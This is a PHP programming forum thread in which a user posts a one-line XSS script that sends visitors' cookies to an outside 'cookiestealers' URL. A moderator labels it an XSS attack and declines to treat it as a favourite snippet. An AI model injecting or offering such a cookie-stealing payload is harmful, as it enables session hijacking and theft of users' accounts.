how 'bout a thread about snippets that grab user info

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
User avatar
$var
Forum Contributor
Posts: 317
Joined: Thu Aug 18, 2005 8:30 pm
Location: Toronto

how 'bout a thread about snippets that grab user info

Post by $var »

This is one that i found in a htmlentities thread, and i like it.
It steals cookies... a la cookie monster.

Code: Select all

<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

that's an XSS attack, that should be directed to the Security board.
User avatar
$var
Forum Contributor
Posts: 317
Joined: Thu Aug 18, 2005 8:30 pm
Location: Toronto

Post by $var »

yah... i know it is... and it's on the security board...
i was going to post this thread in the security board,
but i thought that maybe we could make a thread of our favourite little pieces,
regardless of what they do.

I just thought that the snippets was more of a place to put pieces of code...
should we move the thread?
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

Favourite pieces? Most of us aren't in the habit of using XSS, we just understand where the holes are most often...
User avatar
$var
Forum Contributor
Posts: 317
Joined: Thu Aug 18, 2005 8:30 pm
Location: Toronto

Post by $var »

i'm but wee in the land of code...
i know that anything that I can contribute is peanuts comparatively...
i'll just stick to asking questions for now.
Post Reply